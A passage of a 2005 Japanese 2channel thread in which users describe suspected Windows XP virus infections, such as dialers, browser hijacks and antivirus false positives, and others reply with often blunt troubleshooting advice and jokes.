849名無しさん@お腹いっぱい。:2005/06/09(木) 02:03:16
>>847
しね ノートンは一番終わってる
AVG入れろ
850名無しさん@お腹いっぱい。:2005/06/09(木) 02:04:46
そこに食いついたかw
851名無しさん@お腹いっぱい。:2005/06/09(木) 02:05:30
>>849
すまん
852名無しさん@お腹いっぱい。:2005/06/09(木) 02:06:26
>>849
初心者には難しいから製品バスターおすすめしろ
853名無しさん@お腹いっぱい。:2005/06/09(木) 02:07:19
>>852
すまん
854名無しさん@お腹いっぱい。:2005/06/09(木) 02:08:43
>>847
いや待て、WindowsUpdateはXPならスタートメニューにでかでかと表示されてるはずじゃないか?
「ツール」なんてIE立ち上げた状態限定の繋ぎ方教えんでも。
855名無しさん@お腹いっぱい。:2005/06/09(木) 02:13:13
>>854
847は初心者許してやれ
856名無しさん@お腹いっぱい。:2005/06/09(木) 02:15:54
w
857名無しさん@お腹いっぱい。:2005/06/09(木) 02:21:23
)))))))
(●) (●)     どうも^^!!
  @           ←はなくそ
   ○
858名無しさん@お腹いっぱい。:2005/06/09(木) 05:02:50
すいません。
キンタマウイルスってなんですか?
性病?
859名無しさん@お腹いっぱい。:2005/06/09(木) 05:06:34
(・∀・)ニヤニヤ
860842:2005/06/09(木) 08:53:48
何もしなくても音が鳴るって普通にあることなんですか!?
知りませんでした。
けれどなんで鳴るんだろう・・・。
861842:2005/06/09(木) 08:56:14
脱字があったので書き直します。

【症状を具体的に、分かる限りすべて書く】 数日に1回、 
何も扱っていないのに、フォルダなどをクリックした時の「カチャ」という音がする 
IEなどのブラウザも起動せずマウスすら扱っていないのに、クリックした音だけが聞こえてくる。


でした。
862名無しさん@お腹いっぱい。:2005/06/09(木) 10:23:59
クリックしてないのにカチって音がする?
うPろだに晒す音だったりして(^o^;
863名無しさん@お腹いっぱい。:2005/06/09(木) 15:43:28
>>861
まずはドライバ類を最新に更新してみるってのはどうよ?
マウス・サウンドあたり怪しそうだが。
あと、メーカー品だったら類似のサポート情報が出てないか確認。
サイト上に載って無くても、問い合わせてみたら実は事例があるかも知れない。
864名無しさん@お腹いっぱい。:2005/06/09(木) 16:17:02
すいません、ウィルスかどうかもわからないのですが教えてください。
【使用OS】Windows XP
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 AVG
【ちゃんとUpdateしてるか】 月2回ぐらい
【スキャンした結果(ウイルス名・発見場所)】 発見されず
【別のオンラインスキャンしたならその結果は】 してません
【症状を具体的に、分かる限りすべて書く】 ファイルなどを開こうとすると、削除しようとしたことに
なってしまう。しかも100回分ぐらい削除が動いているらしく、”削除しますか”のウィンドウを閉じる
のが大変。またウィンドウズの立ち上げの時にピーピーと警告音が鳴っています。
【何をしたらそんなことになったのか】 家族共用なので詳細はわかりません。
【これまでにとった措置】 以前にも同じ症状が出て、その時はシステムの復元で修復できたのですが、
今回はその手は通用しませんでした。
【その他の質問】
865名無しさん@お腹いっぱい。:2005/06/09(木) 16:57:41
ウイルスバスターで全スキャンしたら感染無しだったのですが
不安になりシマンテックでオンラインスキャンしたら、ウイルス36個ありました。
こんなことあるんですか?
866名無しさん@お腹いっぱい。:2005/06/09(木) 17:01:46
見つかったウイルスは?
ついでに発見されたフォルダは?
867名無しさん@お腹いっぱい。:2005/06/09(木) 17:02:39
エロ画像コレクションのフォルダなんですが・・
868865:2005/06/09(木) 17:04:58
えっと、結果をみると2chtubo\log\news12.2ch.net\news\1087179672.dat は VBS.LoveLetter.Var に感染とか
全部2chtuboがついています
869名無しさん@お腹いっぱい。:2005/06/09(木) 17:06:57
>>868
ノートンがウイルスコードに誤反応してるだけだから無視でおk
870865:2005/06/09(木) 17:07:43
MHTMLRedir.Exploit
VBS.Network.E
VBS.LoveLetter.Var
Unix.Penguin
こんなんです。
なにななんだか・・・
871865:2005/06/09(木) 17:08:01
そうなんですか!!ありがとうございます!!
872名無しさん@お腹いっぱい。:2005/06/09(木) 18:10:45
【使用OS】XP
【WindowsUpdateしてるか】3ヶ月くらいしてません。
【AntiVirusは何を使っているか】ノートンを使っています。
【ちゃんとUpdateしてるか】してます。
【スキャンした結果(ウイルス名・発見場所)】まだスキャンしてません
【別のオンラインスキャンしたならその結果は】まだスキャンしてません
【症状を具体的に、分かる限りすべて書く】何も起こってません。
【何をしたらそんなことになったのか】
www2.strangeworld.org/uedakana/sahra0002.jpg
「ストレンジワールド」というブラクラを踏んだ。
【これまでにとった措置】いちおうキャッシュを消しました。
【その他の質問】
今後、なにかすべき事があれば教えてほしいです。
873名無しさん@お腹いっぱい。:2005/06/09(木) 18:14:36
>>872です。
リンクを踏んだら首がとれたりかちゃん人形のページに飛びました。
それがブラクラとわかったのは、あとで他の方の指摘があったからです。
874名無しさん@お腹いっぱい。:2005/06/09(木) 18:19:32
>>873
リカちゃんのほうは無問題 ブラクラ動作するほうでもキャッシュ消せばいいだけ
ただ他のにやられないようにWindowsUpdateはしたほうが‥
875872:2005/06/09(木) 18:26:51
安心しました。ありがとうございます。
これからは気をつけます。
876861:2005/06/09(木) 18:31:18
>>862
そういう事例あるんでしょうか・・。

>>863
レスありがとうございます。何からすればいいのかわからなかったので助かります。
まずドライバ入れてみます。
最近パソコンの周辺機器を色々買い換えたのでそのせいかもしれないし。
ありがとうございます。
877名無しさん@お腹いっぱい。:2005/06/09(木) 18:41:38
すみません質問させて下さい。
以前PCの調子が突然おかしくなったので、ウイルスバスター2005を買ってきて
ウイルス検索をかけたところバックドアの一種を仕掛けられてしまったことがわかりました。
一応検索で出てきたウイルスをすべて削除したのですが不安だったので
パソコン自体を購入時にメーカーから配布されたクイックリストアCDを使って工場出荷時の状態に戻しました。
その後、バックドア対策のホームページを色々調べてみると
「ハードディ スクのフォーマットをしてOSの再インストールをすること」という記述があったのですが
これはリストアをする場合でもやっておくべきだったのでしょうか?
もしそうならもう一度はじめから作業をやり直すべきでしょうか?
878名無しさん@お腹いっぱい。:2005/06/09(木) 19:02:00
>>877
やらなくて宜しい
879877:2005/06/09(木) 19:33:30
>>878
有難うございます。おかげで安心できました。
880名無しさん@お腹いっぱい。:2005/06/09(木) 20:33:51
ファイナルストッパーでスパイスキャンしたらActive Keyloger2.0ってでたけどヤバイ?フォルダはprogramフォルダなんだけど・・・
881名無しさん@お腹いっぱい。:2005/06/09(木) 20:37:52
【使用OS】 WindowsXP
【WindowsUpdateしてるか】してない
【症状を具体的に、分かる限りすべて書く】 インターネットエクスプローラーが起動しなくなりネットに接続できず
いつもやってるMMOには接続可能
【何をしたらそんなことになったのか】ネットで画像掲示板を見ようとしたらウィルスが貼り付けられていたのか、急に停止したので再起したが遅かった

【これまでにとった措置】とりあえず 女の顔のアイコンが新しくCドライブに作られていたので削除 しかし接続できず
【その他の質問】 セキュリティソフトを明日入れようと思っていたところこれでした・・・
どうすればよいのか教えてもらえませんか
882名無しさん@お腹いっぱい。:2005/06/09(木) 20:46:34
>>880
おい、active keylogger でググったらやばいぞ‥
883名無しさん@お腹いっぱい。:2005/06/09(木) 21:05:58
882
対処法ぉせえて。
884名無しさん@お腹いっぱい。:2005/06/09(木) 21:13:46
>>881
再起するなよ・・・逆効果だぞ
885名無しさん@お腹いっぱい。:2005/06/09(木) 21:17:37
山田ってレベル10かなぁ

レベル 10: 特に危険
通信ポートを開く可能性があり、多形成な戦術、ステルス インストレーション、またはアンチスパイを解除します。
システムへの損傷やセキュリティ漏洩の可能性が潜在的にあります。
攻撃により使用中のコンピュータが完全に乗っ取られ、コマンドの実行などが行われます。アンチウィルスやファイヤウォール プログラムの無効化するよう試みる場合があります。
886名無しさん@お腹いっぱい。:2005/06/09(木) 21:19:28
887名無しさん@お腹いっぱい。:2005/06/09(木) 21:24:06
ウインドウズウpデートはしてません
アンチウイルスはいれてません
それで不具合でたからどうしろってんだ
自己責任でなんとかしろ
888名無しさん@お腹いっぱい。:2005/06/09(木) 21:26:42
そこをなんとか
889名無しさん@お腹いっぱい。:2005/06/09(木) 21:32:16
シネマティックのスキャンをしたところ
Trojan.StartPage というのにかかってしまいました

フリーの駆除ツールってありますか?

890富士通:2005/06/09(木) 21:36:58
おまいら、インターネットエキスプローラ
開いた?
俺は、I,Eが開かなくなった。

891名無しさん@お腹いっぱい。:2005/06/09(木) 21:41:10
>>890
つーか大人しくInfoMosaic使ってろや ( ゚Д゚)、ペッ
892名無しさん@お腹いっぱい。:2005/06/09(木) 21:50:15
>>889
どこの会社だ、それはw
まずは>>1を読み直して来い
893名無しさん@お腹いっぱい。:2005/06/09(木) 21:53:52
リカバリってDドライブは残るでしたっけ?
894名無しさん@お腹いっぱい。:2005/06/09(木) 21:55:46
>>893
メーカー品なら付属のリカバリCDにその機能が付いてるかどうかは機種次第。説明書嫁。
OSのインスコ用CD-ROMがあるならDドライブを残したOSのみリカバリは可能。
895名無しさん@お腹いっぱい。:2005/06/10(金) 11:51:16
タスクマネージャーにMvb150.exeなる見慣れない物があったのですが、
これはウィルスでしょうか?。
検索してもいまいちひっかからなかったもので^^;
896名無しさん@お腹いっぱい。:2005/06/10(金) 12:34:40
>>881
話にならん。バスター入れてPC教室逝きなさい
897名無しさん@お腹いっぱい。:2005/06/10(金) 12:52:05
>>895
ウイルスでしょうか?って聞く前に、オンラインスキャンでもしろよ
馬鹿か
898名無しさん@お腹いっぱい。:2005/06/10(金) 13:03:56
オンラインスキャンで済むと思ってる897がとりあえず馬鹿。
899名無しさん@お腹いっぱい。:2005/06/10(金) 13:59:59
>>898
馬鹿はお前

>これはウィルスでしょうか?。

オンラインスキャンすりゃ、とりあえずこの疑問は解決するだろうが
質問者に何の知識が無くても「ウイルスかも?」って思うなら、
まずウイルススキャンするのが定説だろうが
900名無しさん@お腹いっぱい。:2005/06/10(金) 14:06:48
こんな時間に馬鹿の言い合いっこをしているあなた方、どちらも馬鹿です・・。
901名無しさん@お腹いっぱい。:2005/06/10(金) 14:54:38
( ´_ゝ`)フーン
902名無しさん@お腹いっぱい。:2005/06/10(金) 15:47:03
ヘッダ情報、演奏内容 共に正常でありながら
内的にウィルスコードを仕込んだ.mp3ファイルなんてものは存在するのですか?
903名無しさん@お腹いっぱい。:2005/06/10(金) 17:42:07
>>902
ファイル名にウィルスのコードをそのまま使うとか(w
904名無しさん@お腹いっぱい。:2005/06/10(金) 17:46:33
春子っ冗談はおやめっお客さんに失礼だよっ
905名無しさん@お腹いっぱい。:2005/06/10(金) 17:50:01
あぁ?誰が春子じゃしばくぞコラ!
906名無しさん@お腹いっぱい。:2005/06/10(金) 19:08:59
こんばんは 春子です。
907名無しさん@お腹いっぱい。:2005/06/10(金) 19:23:15
【使用OS】 ゴミ箱にあったやつ
【WindowsUpdateしてるか】 知らん
【AntiVirusは何を使っているか】 知らん
【ちゃんとUpdateしてるか】 しらん
【スキャンした結果(ウイルス名・発見場所)】 わからん
【別のオンラインスキャンしたならその結果は】 しらん
【症状を具体的に、分かる限りすべて書く】 うんこになった
【何をしたらそんなことになったのか】 シッコかけたら
【これまでにとった措置】 何もしてない
【その他の質問】

色々分からないのでよろしくです
908名無しさん@お腹いっぱい。:2005/06/10(金) 20:26:29
>>899
疑問解決はしないが、緊急対策を要する被害が見えないなら
まずいろいろなところでスキャンするのは正しい。
909名無しさん@お腹いっぱい。:2005/06/10(金) 23:30:18
>>907
うんち
910名無しさん@お腹いっぱい。:2005/06/11(土) 00:52:20
商品の表に表記されている外国の会社のURLから感染した模様です。
IEのホームアドレスが訂正しても再起動すると有害サイトへ飛んでしまいます。
そしてWInからIexploreの警告で「このプログラムは不正な処理を行ったので
強制終了されます」とでるので閉じるボタンを押してもPCをダウンできません。
解決方法を教えてください。初めてなもので全くわかりません・・。
どうぞよろしくお願いいたします。

911名無しさん@お腹いっぱい。:2005/06/11(土) 00:57:31
>>902
MACに感染するトロイでそんなのがあったね。
ttp://www.itmedia.co.jp/news/articles/0404/09/news012.html
912名無しさん@お腹いっぱい。:2005/06/11(土) 01:01:36
なにもしてないのにメモ帳が次々に開くんですけれど、これもウィルスでしょうか?
教えてくらさい(´・ω・`)ショボーン
913名無しさん@お腹いっぱい。:2005/06/11(土) 01:09:43
>>912
気になるなら、まずスキャンしてみたらどうよ?
914名無しさん@お腹いっぱい。:2005/06/11(土) 01:16:16
>>913
MCAFEEのウィルススキャンでスキャンしたんですが異常無しと出ました。
定義ファイルの更新するしかないですよね・・・(つД`)
915名無しさん@お腹いっぱい。:2005/06/11(土) 01:20:32
>>914
ここで汗だくになるまでスキャンしようぜ
http://pc8.2ch.net/test/read.cgi/sec/1031073684/350-352
916名無しさん@お腹いっぱい。:2005/06/11(土) 01:34:39
>>915
m(__)m
917名無しさん@お腹いっぱい。:2005/06/11(土) 01:44:02
>>910
ここのテンプレ読んで実行

エロサイト見たら…助けて下さい!Part55
http://pc8.2ch.net/test/read.cgi/pcqa/1117196310/

XPならシステムの復元してみな
918名無しさん@お腹いっぱい。:2005/06/11(土) 12:39:55
【使用OS】Windows XP
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 ノートン先生
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 発見されず
【別のオンラインスキャンしたならその結果は】 してません
【症状を具体的に、分かる限りすべて書く】
起動した直後にコマンドプロンプトが開いて、
nil
と表示されるんです。
それだけで目に見える範囲では何も起こらないので、そのままXを押して
終了させたのですが、起動する度に勝手に開いてしまって…

とりあえず今のところ障害はなさそうですが、見えないところで
何か起こってたりするんでしょうか?
919名無しさん@お腹いっぱい。:2005/06/11(土) 12:43:10
いやな挙動だな
920918:2005/06/11(土) 13:14:03
起動する時だけだと思ってたら、何かを解凍した時にも出てくるみたいですOrz
ノートン先生は反応してくれないし・・・
921名無しさん@お腹いっぱい。:2005/06/11(土) 15:22:54
>>918
process explorerとfile monitorで挙動を監視。
SSMで挙動を監視&ブロック。
これで原因のプロセスも分かるだろ。
922918:2005/06/11(土) 15:51:04
(;´Д`)??

すいません、せっかく教えていただいたのですが当方初心者でよくわかr…Orz
process explorerというのをダウンロードして、日本語パッチを当てる
とこまではやったのですが・・・
これをどう使って監視するのか教えていただけますでしょうか?
923名無しさん@お腹いっぱい。:2005/06/11(土) 18:18:07
>>922
怪しいプロセスの名前やパスや親プロセスを探る。
924名無しさん@お腹いっぱい。:2005/06/11(土) 18:25:51
【使用OS】 WIN XP
【WindowsUpdateしてるか】 自動更新
【AntiVirusは何を使っているか】 魔かフィー
【ちゃんとUpdateしてるか】 週一
【スキャンした結果(ウイルス名・発見場所)】 ? Live2ch
【別のオンラインスキャンしたならその結果は】 していない
【症状を具体的に、分かる限りすべて書く】 Live2chの動画を見ていたらウィルスがみつかりましたと警告。
【何をしたらそんなことになったのか】 5月末にイラクの動画を5本くらいも見たとき。その後そのサイトは閉鎖。
【これまでにとった措置】 Live2chのファイル削除−魔かフィーのスキャン−正常終了−Live2ch再インストール

【その他の質問】 アルカイダは細菌作戦で世界攻撃に出たのか?
エグイ画像、エロ画像は見ないこと?
925名無しさん@お腹いっぱい。:2005/06/12(日) 03:02:26
ウイルスメールばらまきやがった奴にそのことを指摘したら逆ギレしやがった。
こいつへの効果的な対処方法を教えてくれ!
926名無しさん@お腹いっぱい。:2005/06/12(日) 03:14:21
メールのヘッダーが偽装できることを >>925 が知らない件について
927名無しさん@お腹いっぱい。:2005/06/12(日) 03:25:46
【使用OS】WindowsXP SP2
【WindowsUpdateしてるか】していない
【AntiVirusは何を使っているか】ノートン先生
【ちゃんとUpdateしてるか】半年前から更新してない→体験版ノートン
【スキャンした結果(ウイルス名・発見場所)】
Dialer.Asdplug(C:\WINDOWS\system32\temp532.exeとC:\WINDOWS\system3\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\C9MB856R\Japan[1].exeの2つの場所のどちらかに復元される)
Adware.LinkMaker( C:\WINDOWS\system32\temperror32.dat)
【別のオンラインスキャンしたならその結果は】していません
【症状を具体的に、分かる限りすべて書く】
デスクトップに「click me」というダイヤラーへのショートカット、スタートメニューに
「click me」「uninstall click me 」という、同じくダイヤラーへのショートカットが生成される。PC起動時、またネット接続時に
「This call is not free, this call involves dialing a premium rate number, the cost is International Rates.」というダイアログが出て、その後IEでtp://empnads.comに接続しようとする。何度閉じても再度開こうとする。
【何をしたらそんなことになったのか】特に心当たりは…
【これまでにとった措置】
ノートンが半年前の定義ファイルのままだったので、体験版ノートンを落としてシステム復元オフにして、セーフモードで総スキャン。
50ほどひっかかったが上記2つ以外は全部駆除。シマンテックの対策ページの指示通り、レジストリの値も削除。
Dialer.Asdplugは普通に削除できるが、削除後も勝手に上記サイトをIEで開こうとする。再起動するとまたDialer.Asdplugが復元されている。
復元される場所は2通りある(上記参照)。レジストリの値も元に戻っている。
Adware.LinkMakerも普通に消せるが、消しても数秒ですぐに復元される。
Ad-Aware SEで総スキャン。引っかかったもの全て削除。
【その他の質問】
自分なりに色々試したのですが、しつこく何度もIEで接続しようとします。
システム復元は切っているんだから、復元している元凶があるとは思うのですが…。
シマンテックの該当ページにはそれらしきものは書いてありませんでした。
どなたか、ご教授お願いしますm(_ _)m
928名無しさん@お腹いっぱい。:2005/06/12(日) 03:42:48
>>927マジレスするな

>【WindowsUpdateしてるか】していない
>【AntiVirusは何を使っているか】ノートン先生
>【ちゃんとUpdateしてるか】半年前から更新してない→体験版ノートン
>【別のオンラインスキャンしたならその結果は】していません

実質何もしてないやつに教えられることは何も無い
OSクリーンインスコしな
929名無しさん@お腹いっぱい。:2005/06/12(日) 04:43:17
それマジレスじゃん。
930名無しさん@お腹いっぱい。:2005/06/12(日) 04:43:29
>>927
>どなたか、ご教授お願いしますm(_ _)m

だから何! やだ。
931名無しさん@お腹いっぱい。:2005/06/12(日) 04:55:26
>>927
バカにいちいち説明などするのはもういい加減飽きたから嫌だ。
932名無しさん@お腹いっぱい。:2005/06/12(日) 11:52:45
ノートンに先生ってつける奴キモイ
933名無しさん@お腹いっぱい。:2005/06/12(日) 12:59:47
..ワトスン君と間違っている気だ
934名無しさん@お腹いっぱい。:2005/06/12(日) 14:26:23
>>932
元をたどれば間違えじゃない記憶が・・・・(違ったか?
935927:2005/06/12(日) 15:08:32
どうやら私はバカだったようです。
大人しくOS再インスコしてきます。
936名無しさん@お腹いっぱい。:2005/06/12(日) 17:58:22
ワトスン博士じゃなかったか?
937名無しさん@お腹いっぱい。:2005/06/12(日) 18:18:09
>>934
いや、それで正しいと思われ。
ttp://d.hatena.ne.jp/keyword/%A5Ρ%BC%A5?%F35C08E85C0%B8
938名無しさん@お腹いっぱい。:2005/06/12(日) 18:19:55
939名無しさん@お腹いっぱい。:2005/06/12(日) 21:17:00
実況スレ落としたら「Bloodhound.Exploit.6」なるものを検出したんだが
ウィルスコードによる誤反応と見ていいのか?
940名無しさん@お腹いっぱい。:2005/06/12(日) 21:20:02
yes
941名無しさん@お腹いっぱい。:2005/06/12(日) 21:26:36
>>939
過敏反応の方が表現としては適切だな
942名無しさん@お腹いっぱい。:2005/06/12(日) 22:14:05
>>940-941
dクス。
でも引っ掛かったあと、普通にログ落とそうとしたら、ノートン先生が
やたら反応してしまうようになったんだがどうすればいいのやら・・・。
943名無しさん@お腹いっぱい。:2005/06/12(日) 22:23:08
半角文字板のスレッド一覧をダウンロードしたら
先生が反応するんだけどどうなってるの?
944名無しさん@お腹いっぱい。:2005/06/12(日) 22:30:51
>>943
スレタイのms−itsに反応
http://sakura01.bbspink.com/test/read.cgi/ascii/1118577161/
945名無しさん@お腹いっぱい。:2005/06/13(月) 00:34:41
>>939
ウィルスコード  ( ´ω`)
つーかBloodHoundのガンガリも評価知る、
つーかその見つけたファイルが何なんですかと、
946名無しさん@お腹いっぱい。:2005/06/13(月) 00:41:29
あと、俺の職場の若い娘たちにもシツコク言ってる事なんですが、

てめえら勝手に偉ーメッセージとか脳内省略すんなよ ( ゚Д゚)、ペッ
ノートン先生(?)とかのご託宣を一字一句もらさずコピペしろよ!

「20行とか、なが〜いんですが、よろしいんで?」みたいな配慮は嬉しいけど
勝手に脳内省略しぃの、メッセージ間違えーの、 そんなんじゃ
ShirikoDama 抜かれるぜよ ヽ(`Д´)ノ
947名無しさん@お腹いっぱい。:2005/06/13(月) 05:39:14
>>946はShirikoDama抜かれた経験アリ
948名無しさん@お腹いっぱい。:2005/06/13(月) 11:38:00
世界最強のウイルスってなんですか?


感染してぇ・・・
949名無しさん@お腹いっぱい。:2005/06/13(月) 11:48:39
インフルエンザ
950名無しさん@お腹いっぱい。:2005/06/13(月) 12:33:49
山田
951名無しさん@お腹いっぱい。:2005/06/13(月) 20:16:44
>>948 ラッサ熱
952名無しさん@お腹いっぱい。:2005/06/13(月) 20:30:59
【使用OS】 WinXP
【WindowsUpdateしてるか】 最近はしてませんでした
【AntiVirusは何を使っているか】 ウイルスバスター
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 スキャン不可
【別のオンラインスキャンしたならその結果は】 できないです
【症状を具体的に、分かる限りすべて書く】
PC起動、デスクトップまでは通常通りに起動できるのですが、
デスクトップが激重状態で何もできません。
タスクマネージャーも起動できず、ウイルススキャンもできません。
スタートメニューは何とか表示されるようですが、表示のみで反応してくれません。
【何をしたらそんなことになったのか】
「何かのアプリケーションが不正終了したので再起動します」
と出て再起動したらこのような状態に・・・
何が不正終了したかメモる前に終了させられたので分らずorz
【これまでにとった措置】
デスクトップから動かないので何もしてません。
【その他の質問】
原因だけでも分かる方いましたらお願いします。
953名無しさん@お腹いっぱい。:2005/06/13(月) 20:32:54
とりあえずセーフスキャン汁
954名無しさん@お腹いっぱい。:2005/06/13(月) 20:36:27
ノートン、バスター、マカフィー
一番優れてるソフトはどれでしょうか?
直感でも何でもかまいませんで気軽にお答えください。
955954:2005/06/13(月) 20:37:50
ついでにシェアはどうなってるのでしょうか?
956名無しさん@お腹いっぱい。:2005/06/13(月) 20:39:45
>>952
セーフモードで立ち上げてイベントビューア確認すれば
どのソフトが落ちたか分かると思われ。

>>954
「自分で調べる」という言葉を胸に気軽に消えてください。
957名無しさん@お腹いっぱい。:2005/06/13(月) 20:39:57
>>953
セーフモードで起動はF8連打ですよね。
MyPCでF8連打してもセーフモードで起動できないんですorz

システム構成ユーティリティからは起動できるんですが
今の状況だとシステム構成ユーティリティも起動できなくてお手上げです・・・
958名無しさん@お腹いっぱい。:2005/06/13(月) 20:43:02
>>952
バスターの、例のアップデートファイルだったりして・・・

とりあえずオススメはF8で起動すること。そしてスキャン。

落ちたのがsvchost.exeだったら・・・(´・ω・) カワイソス・・・
959名無しさん@お腹いっぱい。:2005/06/13(月) 20:44:36
>>957
どの時点でF8押してる?
BIOS画面が表示されてる段階からF8押しまくってもダメなのか?
960名無しさん@お腹いっぱい。:2005/06/13(月) 20:45:58
>>958
山田ウイルスではないと思います。
毎日スキャンしてたのでタブン・・・

>>959
ずっとF8連打してみましたがセーフモードに行きませんorz
961名無しさん@お腹いっぱい。:2005/06/13(月) 20:48:26
機種によってはF8じゃないやつもあるんじゃなかったっけ?
ちゃんとマニュアル読んでみた?
962952:2005/06/13(月) 20:52:25
す、すいません。
>>4の症状にかなり似ているので調べてみます・・・

詳しく読まないまま質問すいませんでしたorz
963名無しさん@お腹いっぱい。:2005/06/13(月) 20:54:52
バスターちゃんとUpdateしてて、
いまさらSasserにかかるわけがない。
964952:2005/06/13(月) 20:56:11
>>963
そうなんですか・・・
バスターの更新はしっかりしてるので違うのかな
一先ず調べてみます、お騒がせしました
965名無しさん@お腹いっぱい。:2005/06/13(月) 20:57:25
あるスレで
up.2chan.net/j/src/1118591605577.gif
の入ったURL踏んでしまったんだけど、やばいですか?
個人情報取得しますたとか出たんだけど。。
どのくらいの情報が取られたんだろう?
ウイルスバスターのファイヤーウォールもあったのに。。
誰か教えてください。
966名無しさん@お腹いっぱい。:2005/06/13(月) 20:58:23
どっかのパソはF2連打じゃなかったかな?
967名無しさん@お腹いっぱい。:2005/06/13(月) 21:01:57
>>965
本当にその画像そのものが使われてたんだったら、
画像自体は単なる悪戯用のアニメGIFだから気にしないで良い。
状況の詳細が分からないからこれだけしか言えない。

>>966
F2でBIOS設定画面って機種は見たことあるけどな・・・
968965:2005/06/13(月) 21:10:06
>>967
即レスありがとう。
969名無しさん@お腹いっぱい。:2005/06/13(月) 21:19:03
起動して30分くらいでとても重くなります。
CPUの使用率を見ると常に100%です。
ノートン先生を入れていますが定義ファイルの更新期限が切れて
6ヶ月くらいたちます。
avast!,spybot,ウイルスバスターのオンラインスキャン
で、できるだけやってみたのですが症状が変わりません。
よろしくお願いします。
970名無しさん@お腹いっぱい。:2005/06/13(月) 21:22:19
とりあえず買え
971名無しさん@お腹いっぱい。:2005/06/13(月) 21:25:37
>>969
100%って、誰がもっとも沢山つかってる?
972名無しさん@お腹いっぱい。:2005/06/13(月) 21:51:16
そりゃあNortonとavast併用すりゃあ
CPU100%いくやろ
973名無しさん@お腹いっぱい。:2005/06/13(月) 22:12:43
>>972  釣りなのね Σ(´Д` ズガーン     
974名無しさん@お腹いっぱい。:2005/06/13(月) 22:39:14
ここんところ異常にモデムのアクセスランプがピコピコするからずっと気になってた
んだが、やっと犯人が判ったお。。
C:\WINNT\system32\lxes.exe こいつだ!こいつが何食わぬ顔で起動してやがった

日本のサイトでは一切資料がないが、外国人がコクところによるとどうやらトロイ
らしい。
以下のソフトでは防御・検出できてなかった。
stinger.exe
CWShredder.exe
Ad-Aware SE Personal
SpybotSD.exe
SpywareBlaster
avast!
975初心者:2005/06/13(月) 22:58:09
【使用OS】 WindowsXP
【WindowsUpdateしてるか】2週間に一回程度
【AntiVirusは何を使っているか】 NortonAntiVirus入れていたが使用してませんでした…
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】最初Antivirusに付加?今はC:\RECYCLER\S-1-5-21-436474069-〜…
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 変なエラーが多発。ノートンを開こうとするとこれまたエラーが出る。
                           またアンインストールしようとするとAdministorなのにスーパバイザ権限
                           で入りなおしてくださいと出ます。
【何をしたらそんなことになったのか】 判りません。

【ウイルス名など】
Virus.Win32.Parite.b

シマンテック社やグーグル、トレンドマイクロ社での対策を見て
@セーフモードにして起動
Aレジストリのバックアップを取る
Bレジストリを起動して以下の順に開いていきました↓
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\PINF]
最後にExplorerまで開いて右側に出ているPINFと言うのを消したのですが全く変わらずじまいで…。

なのでアンチドーテと言うウイルス探索型のソフトで探してみると今度は結果に↓
C:\RECYCLER\S-1-5-21-436474069-〜…
と言う箇所にウイルスを検知と表記されます。しかも上記と同じウイルスなので
もう一度PINFを消そうにも、すでにありません。

どうしたらいいでしょうか?質問君で申し訳ありませんが、どなたか対策もしくは
聞かないでココを見ろってスレやHPがありましたら教えて頂きたいです。
長文駄文すいませんでした。 よろしくお願いします。

976975:2005/06/13(月) 23:02:03
>>974
結局上記以外のソフトでは何で発見したんですか?
977975:2005/06/13(月) 23:06:29
何度もすいません…ちなみに975のレスの内容に追加で、、
アンチドーテにて発見したウイルス数は45です…。。
全てC:\RECYCLER\〜…で下数桁が他の数値になっています。
失礼しました。
978名無しさん@お腹いっぱい。:2005/06/13(月) 23:07:51
>>976
原始的な手法ですが、タスクマネージャで一つ一つプロセスを見て、
見慣れない名前のものを片っ端からググってみました。
979名無しさん@お腹いっぱい。:2005/06/13(月) 23:09:46
>>977
レジストリは削除したみたいだけど本体の方は削除したのか?
つーか先に駆除・削除してくれるアンチウイルス入れろ
話にならん
980名無しさん@お腹いっぱい。:2005/06/13(月) 23:17:11
>>975
・ウイルス本体およびレジストリを消去。
・ノートンが正常に動くかどうか確認。
・動いてなかったらノートンをアンインストールする。
・通常の手段でアンインストールできなかったら手動でアンインストール。
・ノートンをインストールし直し。
・最新のパターンファイルで全ドライブ検索。

もしくはノートンを削除してから他のセキュリティソフト体験版(ウイルス削除・隔離機能あり)を使用するのも可。

●「使用していなかった」とは常駐監視を無効にしていたということか?
●丸文字は使うな
●ANTIDOTE=アンチドート
981952:2005/06/13(月) 23:19:57
何とかセーフモードで起動してシステム復元できました。
原因がわからないのでまだ完全ではありませんが報告だけでも。
982975:2005/06/13(月) 23:45:46
>>979
>>980
素早いレスありがとうございます。
本体と言うのはC:\RECYCLER\S-1-5-21-436474069-〜…
の事でしょうか?コレはファイル名検索にて出すのでしょうか?

>>980
「通常でアンインストールできない場合手動でアンインストール」
と言うのはどうするのでしょうか?コントロールパネルのプログラム
の追加や削除ではないと言うことですよね?
ちなみにスーパバイザ権限で無ければ削除できないとでるのですが、
一体なんなんでしょうか?

また●「使用していなかった」とは常駐監視を無効にしていたということか?
ほぼそうです。
また丸文字を使うなとはなんでしょう?上記のレスの数字の事でしょうか?
質問ばかりですいません。
983名無しさん@お腹いっぱい。:2005/06/14(火) 00:44:52
>>982

> 「通常でアンインストールできない場合手動でアンインストール」
> と言うのはどうするのでしょうか?コントロールパネルのプログラム
> の追加や削除ではないと言うことですよね?
> ちなみにスーパバイザ権限で無ければ削除できないとでるのですが、
> 一体なんなんでしょうか?

つ http://www.symantec.co.jp/region/jp/techsupp/kb_search.html

> また丸文字を使うなとはなんでしょう?上記のレスの数字の事でしょうか?
> 質問ばかりですいません。

つ http://support.microsoft.com/default.aspx?scid=kb%3bja%3b878739
984名無しさん@お腹いっぱい。:2005/06/14(火) 01:11:22
>またアンインストールしようとするとAdministorなのにスーパバイザ権限

Administorじゃダメだろ
985名無しさん@お腹いっぱい。:2005/06/14(火) 02:59:52
【使用OS】 XP
【WindowsUpdateしてるか】 してると思います。SP2は入れてません。
【AntiVirusは何を使っているか】 ノートン・アンチウイルス2003
【ちゃんとUpdateしてるか】 してます。
